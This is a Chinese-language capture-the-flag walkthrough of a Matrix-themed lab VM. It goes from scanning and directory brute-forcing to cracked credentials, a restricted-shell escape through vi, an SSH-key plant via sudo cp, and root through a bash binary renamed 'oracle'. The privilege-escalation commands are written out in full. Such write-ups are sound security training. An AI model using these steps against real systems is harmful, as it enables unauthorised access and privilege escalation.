一、信息收集
1.查找MAC地址
2.主机探测
3.目录扫描
扫出了一个目录,后续进行利用
4.端口扫描
发现有三个端口开放,6464为ssh服务,7331为web服务。
二、GetShell
浏览器打开如下的网页,提示“Follow the white rabbit”,黑客帝国的剧情,在页面下方看到了一个很小的兔子图片,想必就是线索了。
查看页面源代码,猜测兔子的链接可能是一个提示
尝试拼接,发现在URL后面加上Matrix页面成功打开,当路径拼接到/Matrix/n/e/o/6/4/出现了一个文件
将其放到kali上,尝试解压,发现命令不能用,查看文件类型才发现其实是个txt文件
gunzip secret.gz
file secret.gz
读取文件内容,是一个用户名和md5加密后的密码
cat secret.gz
admin:76a2173be6393254e72ffa4d6df1030a
进行解密,得出账号为:admin;密码为:passwd
寻找利用方式
打开6464端口进行ssh登录
发现登录失败
打开另一个web页面,发现有个登录框,输入账号密码,登录成功
依旧是一样的页面
尝试利用dirb对路径进行扫描,寻找突破口,这里发现有个data的路径可以访问。
拼接访问,又下载了一个文件
将其放在kali里查看,发现该文件为windows下的可执行程序
放到windows下没有执行成功。
利用IDA pro进行反汇编查看代码。从中找到了一个guest用户和密码。
利用找出的账号密码进行ssh远程连接,成功连接
guest:7R1n17yN30
三、提权
拿到shell发现命令受限,进行提权
使用vi命令调用/bin/sh
利用export修改环境变量,执行/usr/bin/bash拿到bash shell,这样就有了功能完全的shell了。
export PATH="/usr/bin"
/usr/bin/bash
sudo -l
发现可以以trinity用户无密码使用/bin/cp命令
使用guest用户生成一个ssh密钥,保存到/home/guest/.ssh目录下
ssh-keygen
使用chmod命令为id_rsa.pub添加可执行权限,可以让trinity用户使用,使用trinity用户将生成的id_rsa.pub复制到trinity家目录下
chmod 777 .ssh
chmod 777 .ssh/id_rsa.pub
ls -al .ssh/
sudo -u trinity /bin/cp .ssh/id_rsa.pub /home/trinity/.ssh/authorized_keys
使用ssh连接trinity用户,成功登录
ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464
sudo -l
发现可以以root用户权限无密码使用oracle命令,将/usr/bin/bash复制到trinity家目录下并改名为oracle
cp /usr/bin/bash oracle
chmod +x oracle
ls -al
调用oracle,成功拥有root权限,在root目录下找到flag.txt文件
sudo ./oracle
cd /root/
cat flag.txt